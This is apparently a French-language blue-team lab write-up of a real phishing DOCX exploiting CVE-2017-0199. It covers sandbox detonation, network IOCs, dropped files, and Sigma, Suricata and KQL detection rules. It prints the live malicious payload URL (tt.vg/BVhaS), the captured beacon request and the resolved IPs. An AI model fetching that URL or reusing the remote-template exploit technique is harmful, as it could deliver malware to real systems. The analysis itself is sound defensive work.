Retour aux mises à jour
UpdatedJul 28, 2026

RCE-CVE-2017-0199-detection-analysis — Mis à jour !

Ce dépôt contient une analyse complète de malware côté blue team d'un DOCX malveillant réel exploitant CVE-2017-0199. Le laboratoire comprend l'exécution en sandbox, la forensique réseau, l'extraction d'IOC, le mapping MITRE ATT&CK, l'examen des fichiers déposés et des règles de détection. Des captures d'écran de preuves sont incluses dans le dossier evidence pour une documentation professionnelle.

Partager

🛡️ BankPaymAdviceVend.Report.docx CVE-2017-0199 – Analyse complète en bac à sable Blue Team

Détonation de malware avancé • Comportement d'exploit • IOC • Ingénierie de détection.



🎯 1. Résumé Exécutif

Ce dépôt documente un **vrai fichier DOCX malveillant** exploitant la vulnérabilité **CVE-2017-0199** d'exécution de code à distance dans Microsoft Office. L'échantillon a été détoné dans un **bac à sable ANY.RUN sous Windows 10**, exposant :

✔ Chaîne d'exploitation complète
✔ Rappels réseau vers un domaine malveillant (tt.vg)
✔ Fichiers déposés et artefacts temporaires
✔ Empreintes JA3
✔ Activité du registre
✔ Balisage HTTP/HTTPS depuis WINWORD.EXE
✔ IOC Blue Team complets et règles de détection


🔍 2. Contexte du Scénario

Un document intitulé « BankPaymAdviceVend.Report.docx » a été reçu via un e-mail de phishing.
Une fois détoné, ANY.RUN l'a immédiatement marqué comme Malveillant et l'a associé à :

  • Exploit RCE Word CVE-2017-0199
  • WINWORD.EXE établissant des connexions HTTP/HTTPS furtives
  • Contact avec le domaine court malveillant tt.vg
  • Tentative de récupération de la charge utile distante /BVhaS


📄 3. Informations sur l'Échantillon

ChampValeur
FichierBankPaymAdviceVend.Report.docx
VerdictActivité malveillante
Tagscve-2017-0199, exploit
MD522EDED727467A9A26F3FD311A12A7E
SHA16738D1A969193459C7C7579956269D77FED8D26F
SHA2562E1408013503C...3D6EAF9
Bac à sableWindows 10 Pro x64
ComportementExploit → Balisage réseau → Fichiers déposés

🧬 4. Chaîne d'Attaque (Diagramme de Haut Niveau)

[ DOCX Malveillant ] │ ▼ [ L'utilisateur ouvre dans Word ] │ ▼ [ L'exploit CVE-2017-0199 se déclenche ] │ ▼ [WINWORD.EXE → tt.vg via HTTP/HTTPS] │ ▼ [ Chemin distant : /BVhaS (GET / HEAD / OPTIONS) ] │ ▼ [ Fichiers temporaires, objets EMF, fichiers cache déposés ] │ ▼ [ Charge utile potentielle de l'étape suivante — Le serveur a renvoyé 404 ]

yaml Copy code


🌐 5. Comportement Réseau

5.1 Requêtes DNS

Un seul domaine était malveillant :

DomaineRéputation
tt.vg🔴 malveillant

IP résolues :

188.114.96.3 188.114.97.3 172.67.138.42 (TLS v1.2)

yaml Copy code


📡 5.2 Balisage HTTP/HTTPS

Word a tenté de récupérer :

GET /BVhaS HEAD /BVhaS OPTIONS / Hôte : tt.vg User-Agent : Microsoft Office / usurpation MSIE 7

yaml Copy code

Requête typique capturée :

GET /BVhaS HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0...) Connection: Keep-Alive Host: tt.vg

arduino Copy code

Réponse du serveur :

HTTP/1.1 404 Not Found

yaml Copy code


📁 6. Fichiers Déposés

Artefacts Notables

  • Plusieurs fichiers .tmp
  • Objets graphiques Office .glox
  • Images EMF dans le cache du navigateur :
    %LOCALAPPDATA%\INetCache\Content.MSO\*.emf
  • Raccourci de document récent .LNK
  • Journaux index.dat
  • Modifications du dictionnaire de vérification orthographique Office

🔐 7. Registre et Comportement Système

Word a accédé à :

HKCU\Software\Microsoft\Office\14.0... HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings... HKLM\System\ControlSet001\Services\Tcpip\Parameters\Interfaces...

yaml Copy code

✔ Normal pour Office
❌ Combiné avec l'exploit = comportement clairement malveillant


💣 8. Analyse de l'Exploit — CVE-2017-0199

Type : Exécution de code à distance
Déclencheur : Un DOCX malveillant charge un HTA distant sans interaction de l'utilisateur
Introduit dans : Microsoft Word 2007–2016
Impact : L'attaquant exécute du code arbitraire

Cet échantillon tente de charger une charge utile distante depuis :

http://tt.vg/BVhaS

yaml Copy code


🧩 9. IOC

🔥 9.1 Indicateurs Réseau

Domaine : tt.vg

URL : http://tt.vg/BVhaS https://tt.vg/BVhaS

IP : 188.114.96.3 188.114.97.3 172.67.138.42

shell Copy code

🔐 9.2 Empreintes SSL JA3

091f51a7a1c3a4504a224cc081ce9cee 46f5131e766d248db0248a86c494b71c 65005c9d9ae0f0ebeaf22c210571d482 ...

yaml Copy code


🔍 10. Idées de Détection (Sigma / Suricata / EDR)

Cette section convertit l'analyse technique de BankPaymAdviceVend.Report.docx en artefacts de détection pratiques et prêts pour la production qu'un SOC ou une Blue Team peut déployer immédiatement. Elle comprend des règles Sigma, des signatures IDS Suricata et des requêtes de chasse EDR.


🧾 10.1 Règle Sigma — WINWORD → tt.vg

Cette règle Sigma détecte toute connexion réseau initiée par WINWORD.EXE vers le domaine court suspect tt.vg dans les journaux réseau Windows.

title: WINWORD Connecting To Suspicious Short Domain tt.vg
id: 0b2a5f3d-ttvg-word
status: experimental

logsource:
  category: network_connection
  product: windows

detection:
  selection:
    Image|endswith: '\WINWORD.EXE'
    DestinationHostname: 'tt.vg'
  condition: selection

level: high
tags:
  - attack.command_and_control
  - attack.t1071.001
  - cve.2017-0199

💡 Tout système Office obsolète contactant tt.vg via WINWORD.EXE doit déclencher une enquête immédiate.


🌐 10.2 Règle Suricata — HTTP GET /BVhaS sur tt.vg

Une règle IDS Suricata qui identifie une requête d'origine Office pour GET /BVhaS sur le domaine malveillant tt.vg. Cela détecte la tentative de récupération de la charge utile de l'exploit.

alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"C2 – Office WINWORD GET /BVhaS on tt.vg";
    flow:established,to_server;
    http.method; content:"GET";
    http.uri; content:"/BVhaS"; nocase;
    http.host; content:"tt.vg"; nocase;
    http.user_agent; content:"MSOffice"; nocase;
    reference:cve,2017-0199;
    classtype:trojan-activity;
    sid:4200010;
    rev:1;
)

🔥 Très efficace dans les environnements utilisant Suricata ou Zeek pour surveiller le trafic sortant.


🛰️ 10.3 Requête de Chasse EDR — Indicateurs WINWORD + tt.vg

Une requête de chasse KQL (Microsoft Defender) utilisée pour identifier toute machine de l'environnement présentant un balisage malveillant similaire vers tt.vg ou ses adresses IP associées.

DeviceNetworkEvents
| where InitiatingProcessFileName == "WINWORD.EXE"
| where RemoteUrl in ("tt.vg")
   or RemoteIp in ("188.114.96.3","188.114.97.3","172.67.138.42")

🎯 Objectif : étendre une simple détonation en bac à sable à une chasse à l'échelle de toute l'entreprise.


🧩 11. Ce Que Ce Laboratoire Démontre

Ce laboratoire démontre votre capacité à analyser un échantillon réel de DOCX de phishing de bout en bout, en suivant une méthodologie complète de niveau SOC :

  • Comprendre comment CVE-2017-0199 est déclenché dans Microsoft Word.
  • Suivre comment WINWORD.EXE devient un client HTTP/S inattendu.
  • Extraire les IOC réseau (domaines, URL, IP, hachages TLS JA3).
  • Analyser les fichiers déposés, les raccourcis récents et l'accès au registre pour leur valeur forensique.
  • Transformer tous les résultats en requêtes de chasse Sigma, Suricata et EDR.

En d'autres termes — ce laboratoire ne s'arrête pas à la détonation. Il extrait une intelligence de détection réelle et exploitable, exactement comme le ferait un analyste SOC professionnel.


Conçu et documenté par Ahmed Tarek Salah

Catégories